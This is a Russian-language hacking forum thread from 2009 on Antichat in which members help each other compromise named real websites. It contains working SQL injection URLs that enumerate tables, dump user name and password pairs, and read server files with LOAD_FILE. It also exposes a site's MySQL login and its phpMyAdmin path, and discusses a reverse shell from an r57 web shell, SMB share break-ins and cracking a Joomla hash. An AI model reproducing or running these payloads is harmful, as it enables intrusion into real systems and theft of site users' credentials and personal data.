HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6151  
Старый 24.03.2009, 19:32
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
 
Ответить с цитированием

  #6152  
Старый 24.03.2009, 20:07
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

ограничение длины запроса. Вывод - никак по данной ссылке, даже при таком варианте:

Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4.html
вернее можно, элементарно, но так:

Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+and+substring(version(),1,1)=5.html
т.е. как бы вслепую

Последний раз редактировалось Pashkela; 24.03.2009 в 20:18..
 
Ответить с цитированием

  #6153  
Старый 24.03.2009, 20:20
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

ПОмогите админку найти
http://www.rustrana.ru/
 
Ответить с цитированием

  #6154  
Старый 24.03.2009, 20:21
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
Чисто таблички user нету,
PHP код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat(table_schema,0x2E,table_name)+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.TABLES+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+and+table_name+LIKE+0x257573657225.html 
karabas_svalka2.t_users
karabas_svalka2.t_users_activate

karabas_svalka2.t_users(в t_users_activate такие же колумны):
PHP код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(COLUMN_NAME+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='t_users'.html 
id
email
passwd
user_type
creation_date
comment
name
phone
icq
id_city
id_country
bday
bmonth
byear
sex
id_prefix


ну не вижу в чем проблема вытаскивай например вот так с них:
PHP код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat_ws(0x3A,name,passwd)+separator+'%3Cbr%3E'),25,26,27,28,29,30,31,32,33,34+from+karabas_svalka2.t_users.html 
2Byrger
Читалка файлов(как мило с их стороны )
PHP код:
http://www.rustrana.ru/article.php?nid=3486853333+union+select+concat('/var/www/site3/public_html/connect.php',0x00),2,3,4,5,@@version,7,8,9,10,11,12,13,14,15--+ 
Реквизиты конекта MySQL:
USER:dbu_ansimov_1
PASS:BFzHAHAMz1K

Ну и сам phpMyAdmin - http://www.rustrana.ru/phpadm/

Последний раз редактировалось AkyHa_MaTaTa; 24.03.2009 в 22:04..
 
Ответить с цитированием

  #6155  
Старый 25.03.2009, 06:41
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

Цитата:
Сообщение от _SEREGA_  
Люди,подскажите пожалуйста, как получить доступ на хдд локального компа. Я просканил его, у него открыты 139 тцп и 137 удп и ещё 135.
такая фишка типа 192.168.0.1/C$ ,admin$ и т.д. просит пароль! подскажите каким путём ломать.
чтобы зайти в эти директории нужно быть в той же группе что и тот комп к примеру: MSHOME
и у тебя название и пароль учётки должен быть такой же как у того админа...
 
Ответить с цитированием

  #6156  
Старый 25.03.2009, 07:13
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от _SEREGA_  
Люди,подскажите подвлуйста, как полоучить доступ на хдд локального компа. Я просканил его, у него открыты 139 тцп и 137 удп и ещё 135.
такая фишка типа 192.168.0.1/C$ ,admin$ и т.д. просит пароль! подскажите каким путём ломать.
теперь проверь эти порты хspider'om на уязвимости
 
Ответить с цитированием

  #6157  
Старый 25.03.2009, 12:05
Art-Ge-Force
Новичок
Регистрация: 19.04.2008
Сообщений: 28
С нами: 9505445

Репутация: 16
По умолчанию

http://wow.homeline.kg/test/?apage=guilds&guid=102'
что тут можно сделать ? можно шелл залить ?
 
Ответить с цитированием

  #6158  
Старый 25.03.2009, 12:20
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://wow.homeline.kg/test/?apage=guilds&guid=102+and+substring(version(),1,1)=5
5-я ветка.

Код:
http://wow.homeline.kg/test/?apage=guilds&guid=102+union+select+1
1 колонка без вывода.

Код:
http://wow.homeline.kg/test/?apage=guilds&guid=102+and+ascii(substring((SELECT+file_priv+from+mysql.user+limit+0,1),1,1))=89
file_priv=Y.

Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)

Последний раз редактировалось mailbrush; 25.03.2009 в 12:29..
 
Ответить с цитированием

  #6159  
Старый 25.03.2009, 12:50
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от mailbrush  
Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)
Просто не нужно торопиться

http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,concat_ws(0x3a,User(),Data base(),Version()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43--+

http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,LOAD_FILE(0x633A2F626F6F74 2E696E69),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43--+

И ещё момент, file_priv так не проверяется. Тоесть в данном случае это прокатило, но ты же не знал, что база под рутом. Ты проверил его у первой записи в таблице, а это всегда (почти) рут. А нужно проверять у текущего юзера
 
Ответить с цитированием

  #6160  
Старый 25.03.2009, 15:54
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
З.Ы. Порты разные пробовал, shell - r57
________________________________
added
Ещё вопросец.
Вытянул из джумлы админский пасс в хеше
Такого вида
(id,username,password)
62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNC slakgoAAuq55wasFVX8zGRYkIa
Солёный? Или?

Последний раз редактировалось Imperou$; 25.03.2009 в 18:29..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...